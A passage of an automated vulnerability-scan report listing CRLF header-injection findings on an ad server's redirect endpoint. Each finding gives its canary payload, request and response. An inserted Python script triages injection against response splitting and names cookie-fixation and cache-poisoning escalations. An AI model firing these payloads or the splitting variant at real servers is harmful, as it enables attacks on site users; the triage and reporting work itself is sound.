Set-Cookie: ANON_ID=aMnhU0R3Y7ALfDPBMPikUZa2A2fia21TYZa1qupgjdEqT5EmNtWD3oD66ZdpEk5l6TkvUJsnB2CaBp33b00nu9Yew2EoNkK2dLa42m70jbmoLBvREaLC8wZdQxPONQly6yIu2obgkxy0jJednCW4BJi4RhvYI57HOmLX1d1edsePii0GroZaNdXDPP41PRZcjPiKxCyWCZa9Ce8BSHkdXP2iC3QMk7jFZa4rEmi7gWNuca1SNRPRRXVyKDNIjZdSftLvQaAfMHUDbBIpwKupK3vHK8mHOZdaO4xnF38JocEyh71ga1BJntDIXAJF9qfE739eCZc2w4DsquMLZcX1kASIl4EvjZdjZbKjxrjj5ISw8E3TuZdOn0TZdGbmZauuNoNrZbB8NtNZcPOC0ZbyZbO7GZdBweXb1BSMKHxPw5JGlqJOeJOe6bD2YBeG3pBikogvQ2nLHNyggiNsMckU0gfFr9jkuPBZcSJ3Zc5nmBHb7Y20Eady; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:24:51 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=b3f74
884d93094bb
&dcp=zmm.57350078.&dcc=40424790.233402132
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.116. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 26972%0d%0a53a2f8f14bb was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/?26972%0d%0a53a2f8f14bb=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=...[SNIP]...;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=...[SNIP]...; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:45 GMT;
Content-Type: text/html
Location: ?26972
53a2f8f14bb
=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>
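
How a finding like 3.116 is confirmed from the wire, as an added example (not the crawler's code and not from any server listed here): the scanner sends a payload of the form `<prefix>%0d%0a<suffix>`, and the issue is genuine only when `<suffix>` comes back at the start of its own header line, which is what the split `Location:` lines above show. The sample responses are constructed to mirror 3.116, with the CRLF that the report renders as a line break restored as bytes; a third constructed sample shows the doubled-CRLF escalation (response splitting) that the report's entries do not test for.

```python
"""Confirm a CRLF header injection from a raw HTTP response.

Added example, not part of the crawler report. The scanner sends a
payload of the form <prefix>%0d%0a<suffix>; the finding is genuine only
if <suffix> comes back at the *start* of its own header line, which
means the server decoded the CRLF and wrote it into a header unencoded.
"""
import re

SUFFIX = "53a2f8f14bb"  # second half of the 3.116 payload 26972%0d%0a53a2f8f14bb

# Constructed sample mirroring the 3.116 response, with the CRLF that the
# report renders as a line break restored as bytes.
VULNERABLE_RESPONSE = (
    b"HTTP/1.1 302 Moved Temporarily\r\n"
    b"Cache-Control: no-cache\r\n"
    b"Content-Type: text/html\r\n"
    b"Location: ?26972\r\n"
    b"53a2f8f14bb\r\n"          # the suffix now opens a header line
    b"=1\r\n"
    b"Content-Length: 36\r\n"
    b"Connection: Close\r\n"
    b"\r\n"
    b"<h1>Error 302 Moved Temporarily</h1>"
)

# Constructed sample of a fixed server: the CRLF is re-encoded on output,
# so the suffix stays inside the Location value.
SAFE_RESPONSE = (
    b"HTTP/1.1 302 Moved Temporarily\r\n"
    b"Location: ?26972%0D%0A53a2f8f14bb=1\r\n"
    b"Content-Length: 36\r\n"
    b"\r\n"
    b"<h1>Error 302 Moved Temporarily</h1>"
)

# Constructed sample for the escalation payload 26972%0d%0a%0d%0a53a2f8f14bb:
# the doubled CRLF ends the header block, so the suffix opens the body.
SPLIT_RESPONSE = (
    b"HTTP/1.1 302 Moved Temporarily\r\n"
    b"Location: ?26972\r\n"
    b"\r\n"
    b"53a2f8f14bb=1\r\n"
    b"Content-Length: 36\r\n"
    b"\r\n"
    b"<h1>Error 302 Moved Temporarily</h1>"
)


def split_response(raw: bytes):
    """Return (status_line, header_lines, body); tolerates bare LF."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        head, sep, body = raw.partition(b"\n\n")
    lines = re.split(rb"\r?\n", head)
    return lines[0], lines[1:], body


def injected_header_lines(raw: bytes, suffix: str) -> list:
    """Header lines that begin with the suffix. A suffix that merely
    appears inside a value (Location: ?26972%0D%0A53a2f8f14bb=1) is a
    reflection, not an injection; only a line opening with it proves
    that a raw CRLF was emitted."""
    _, headers, _ = split_response(raw)
    needle = suffix.encode()
    return [h for h in headers if h.startswith(needle)]


def is_header_injected(raw: bytes, suffix: str) -> bool:
    return bool(injected_header_lines(raw, suffix))


def body_controlled(raw: bytes, suffix: str) -> bool:
    """Response-splitting check for the doubled-CRLF payload: True if the
    suffix starts the body, i.e. the attacker can terminate the headers."""
    _, _, body = split_response(raw)
    return body.startswith(suffix.encode())


def classify(raw: bytes, suffix: str) -> str:
    """Triage label, strongest condition first."""
    if body_controlled(raw, suffix):
        return "response-splitting"
    if is_header_injected(raw, suffix):
        return "header-injection"
    if suffix.encode() in raw:
        return "reflected-only"
    return "not-reflected"


if __name__ == "__main__":
    for name, raw in [("3.116 as reported", VULNERABLE_RESPONSE),
                      ("fixed server", SAFE_RESPONSE),
                      ("doubled CRLF", SPLIT_RESPONSE)]:
        print(f"{name}: {classify(raw, SUFFIX)}")
```

The distinction matters for triage. The report rates every entry High, but an injection that lands only inside `Location` lets the attacker add headers (an injected `Set-Cookie` on a 302 is honoured by browsers, which is cookie fixation on the ad domain), while also controlling the body is what turns it into cache poisoning or script execution on the vulnerable host. The check is on line position rather than header name, so a server that answers with a lowercase `location:` header, as 3.127 does, is handled the same way.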

3.117. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/ [ord parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/

Issue detail

The value of the ord request parameter is copied into the Location response header. The payload 289df%0d%0af5f35e76bbb was submitted in the ord parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/;ord=289df%0d%0af5f35e76bbb HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=...[SNIP]...;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=...[SNIP]...; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:41 GMT;
Content-Type: text/html
Location: ;ord=289df
f5f35e76bbb

Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.118. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload c44f8%0d%0a5a08a3ec162 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/c44f8%0d%0a5a08a3ec162/pixel.quantserve.com/r HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=...[SNIP]...; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:31 GMT;
Content-Type: text/html
Location: c44f8
5a08a3ec162
/pixel.quantserve.com/r
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.119. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload e3bb1%0d%0a8e9ee6e06df was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/e3bb1%0d%0a8e9ee6e06df/r HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=...[SNIP]...;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=...[SNIP]...; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:33 GMT;
Content-Type: text/html
Location: http:/e3bb1
8e9ee6e06df
/r
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.120. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 558f5%0d%0a3e39ab254d8 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/558f5%0d%0a3e39ab254d8 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=...[SNIP]...;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=...[SNIP]...; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:58 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/558f5
3e39ab254d8

Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.121. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [a parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r

Issue detail

The value of the a request parameter is copied into the Location response header. The payload dca0d%0d%0a172d6a83c62 was submitted in the a parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r;a=dca0d%0d%0a172d6a83c62&vehicle=versa-hatchback&dcp=zmm.50658498.&dcc=39942763.226884546 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=...[SNIP]...;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=...[SNIP]...; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:20 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r;a=dca0d
172d6a83c62
&vehicle=versa-hatchback&dcp=zmm.50658498.&dcc=39942763.226884546
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.122. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [dcc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r

Issue detail

The value of the dcc request parameter is copied into the Location response header. The payload 3a2f2%0d%0a19a38b62d09 was submitted in the dcc parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=versa-hatchback&dcp=zmm.50658498.&dcc=3a2f2%0d%0a19a38b62d09 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=...[SNIP]...;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=ahnEZcdm5abw6yuoZbUjT4fqUDUD2sYQZdDZaWW5gcOxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRm7xqnMnbNZckbcJL08tom0uWyJjGe8Zdt6BlH3Zcgcsh0fhhxv3ZaQZcwFXZaO9JVcJ3us2ZdEZbqUeIufqjSpys4WJ0ZcM4mr6MsaUrZcq3FYXmmEoyQZaT2oCpbp7Sa9R3qwWor4D8Mm5YBhUPfTZcWiokxRZdyDL8ZbxJGTKqMF1iAxwbpb54Zai70umIZbgT65ppZbnyB7gIZbDyGW8UKFavkRTEsxqlZaN1iaCB0Zbhnt9bXPMbvK8Cj2qIwq36U2FZdw8PHnZcPIElM4thBbss0LXiUdc6BFUqKGbcRobHZaYNo3S33TtJsIZd6Q06nZbVJc7y70AYUTNgFPp8SXa9QKEca2elev3OL5Sto7v35jL0kb6Nb7QY5ZdtYgneZdZaZaD8HJZaR6KLvrtv4ZaELqBJ2vX8DOdb7w7mmWRbQmEagXeFqev4lPVrOVZaLFXg4cTZdsNZbIqRmbujXWMuINv8oDedPbFX08cibqIqDiZd4jLJfCGZcv44L9PUotwSsmsM2ZaviZbZa9f; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:51 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=versa-hatchback&dcp=zmm.50658498.&dcc=3a2f2
19a38b62d09

Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.123. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [dcp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r

Issue detail

The value of the dcp request parameter is copied into the Location response header. The payload e956a%0d%0a58d4acea581 was submitted in the dcp parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=versa-hatchback&dcp=e956a%0d%0a58d4acea581&dcc=39942763.226884546 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=...[SNIP]...;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=...[SNIP]...; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:40 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=versa-hatchback&dcp=e956a
58d4acea581
&dcc=39942763.226884546
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.124. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload d90e5%0d%0a5824a831334 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r?d90e5%0d%0a5824a831334=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=...[SNIP]...;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=...[SNIP]...; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:02 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r?d90e5
5824a831334
=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.125. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [vehicle parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r

Issue detail

The value of the vehicle request parameter is copied into the Location response header. The payload 2947d%0d%0a05ef6ceb7f1 was submitted in the vehicle parameter. This caused a response containing an injected HTTP header.

Request

